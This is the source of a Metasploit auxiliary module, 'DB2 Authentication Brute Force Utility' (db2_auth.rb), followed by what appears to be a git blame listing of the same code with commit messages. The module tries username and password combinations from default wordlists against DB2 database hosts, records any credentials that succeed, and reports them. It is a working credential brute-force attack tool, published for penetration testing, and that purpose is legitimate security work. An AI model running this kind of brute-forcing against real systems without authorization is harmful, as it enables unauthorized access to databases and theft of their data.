metasploit-framework/modules/auxiliary/scanner/db2/db2_auth.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/db2'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::DB2
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'           => 'DB2 Authentication Brute Force Utility',
      'Description'    => %q{This module attempts to authenticate against a DB2
        instance using username and password combinations indicated by the
        USER_FILE, PASS_FILE, and USERPASS_FILE options.},
      'Author'         => ['todb'],
      'References'     =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'License'        => MSF_LICENSE
    )

    register_options(
      [
        OptPath.new('USERPASS_FILE',  [ false, "File containing (space-seperated) users and passwords, one pair per line",
          File.join(Msf::Config.data_directory, "wordlists", "db2_default_userpass.txt") ]),
        OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "db2_default_user.txt") ]),
        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "db2_default_pass.txt") ]),
      ], self.class)
  end

  def run_host(ip)
    cred_collection = Metasploit::Framework::CredentialCollection.new(
        blank_passwords: datastore['BLANK_PASSWORDS'],
        pass_file: datastore['PASS_FILE'],
        password: datastore['PASSWORD'],
        user_file: datastore['USER_FILE'],
        userpass_file: datastore['USERPASS_FILE'],
        username: datastore['USERNAME'],
        user_as_pass: datastore['USER_AS_PASS'],
        realm: datastore['DATABASE']
    )

    cred_collection = prepend_db_passwords(cred_collection)

    scanner = Metasploit::Framework::LoginScanner::DB2.new(
        host: ip,
        port: rport,
        proxies: datastore['PROXIES'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        connection_timeout: 30
    )

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
          module_fullname: self.fullname,
          workspace_id: myworkspace_id
      )
      if result.success?
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)

        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
      else
        invalidate_login(credential_data)
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
      end
    end
  end

end
See #726. Adds a DB2 scanner and brute forcer. git-svn-id: file:///home/svn/framework3/trunk@8223 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-25 15:58:24 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
See #726. Adds a DB2 scanner and brute forcer. git-svn-id: file:///home/svn/framework3/trunk@8223 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-25 15:58:24 +00:00			`##`


			`require 'msf/core'`
refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00			`require 'metasploit/framework/credential_collection'`
			`require 'metasploit/framework/login_scanner/db2'`
See #726. Adds a DB2 scanner and brute forcer. git-svn-id: file:///home/svn/framework3/trunk@8223 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-25 15:58:24 +00:00
			`class Metasploit3 < Msf::Auxiliary`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::DB2`
			`include Msf::Auxiliary::AuthBrute`
			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize`
			`super(`
			`'Name' => 'DB2 Authentication Brute Force Utility',`
			`'Description' => %q{This module attempts to authenticate against a DB2`
			`instance using username and password combinations indicated by the`
			`USER_FILE, PASS_FILE, and USERPASS_FILE options.},`
			`'Author' => ['todb'],`
			`'References' =>`
			`[`
			`[ 'CVE', '1999-0502'] # Weak password`
			`],`
			`'License' => MSF_LICENSE`
			`)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",`
Find and replace 2013-09-26 19:34:48 +00:00			`File.join(Msf::Config.data_directory, "wordlists", "db2_default_userpass.txt") ]),`
Retab modules 2013-08-30 21:28:54 +00:00			`OptPath.new('USER_FILE', [ false, "File containing users, one per line",`
Find and replace 2013-09-26 19:34:48 +00:00			`File.join(Msf::Config.data_directory, "wordlists", "db2_default_user.txt") ]),`
Retab modules 2013-08-30 21:28:54 +00:00			`OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",`
Find and replace 2013-09-26 19:34:48 +00:00			`File.join(Msf::Config.data_directory, "wordlists", "db2_default_pass.txt") ]),`
Retab modules 2013-08-30 21:28:54 +00:00			`], self.class)`
			`end`
See #726. Adds a DB2 scanner and brute forcer. git-svn-id: file:///home/svn/framework3/trunk@8223 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-25 15:58:24 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(ip)`
refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00			`cred_collection = Metasploit::Framework::CredentialCollection.new(`
			`blank_passwords: datastore['BLANK_PASSWORDS'],`
			`pass_file: datastore['PASS_FILE'],`
			`password: datastore['PASSWORD'],`
			`user_file: datastore['USER_FILE'],`
			`userpass_file: datastore['USERPASS_FILE'],`
			`username: datastore['USERNAME'],`
			`user_as_pass: datastore['USER_AS_PASS'],`
			`realm: datastore['DATABASE']`
			`)`

call new prepend cred methods add method calls o all the lgoinscanner modules so that they call the prepend_db_* methods as approrpiate these methods automatically check to see if DB_ALL_CREDS was selected 2014-09-04 17:32:35 +00:00			`cred_collection = prepend_db_passwords(cred_collection)`

refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00			`scanner = Metasploit::Framework::LoginScanner::DB2.new(`
			`host: ip,`
			`port: rport,`
			`proxies: datastore['PROXIES'],`
			`cred_details: cred_collection,`
			`stop_on_success: datastore['STOP_ON_SUCCESS'],`
			`connection_timeout: 30`
			`)`

			`scanner.scan! do \|result\|`
refactor db2 2014-08-01 18:00:27 +00:00			`credential_data = result.to_h`
			`credential_data.merge!(`
			`module_fullname: self.fullname,`
			`workspace_id: myworkspace_id`
			`)`
refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00			`if result.success?`
			`credential_core = create_credential(credential_data)`
refactor db2 2014-08-01 18:00:27 +00:00			`credential_data[:core] = credential_core`
			`create_credential_login(credential_data)`
Fixed up reporting for DB2 and tested; also added other default usernames for db2. git-svn-id: file:///home/svn/framework3/trunk@8411 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-08 18:54:50 +00:00
refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00			`print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"`
			`else`
refactor db2 2014-08-01 18:00:27 +00:00			`invalidate_login(credential_data)`
Fix #3995 - Make negative messages less verbose As an user testing against a large network, I only want to see good news, not bad news. 2014-10-11 16:11:09 +00:00			`vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"`
refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00			`end`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
refactor db2_auth module you know what it is 2014-06-10 18:43:07 +00:00
See #726. Adds a DB2 scanner and brute forcer. git-svn-id: file:///home/svn/framework3/trunk@8223 4d416f70-5f16-0410-b530-b9f4589650da 2010-01-25 15:58:24 +00:00			`end`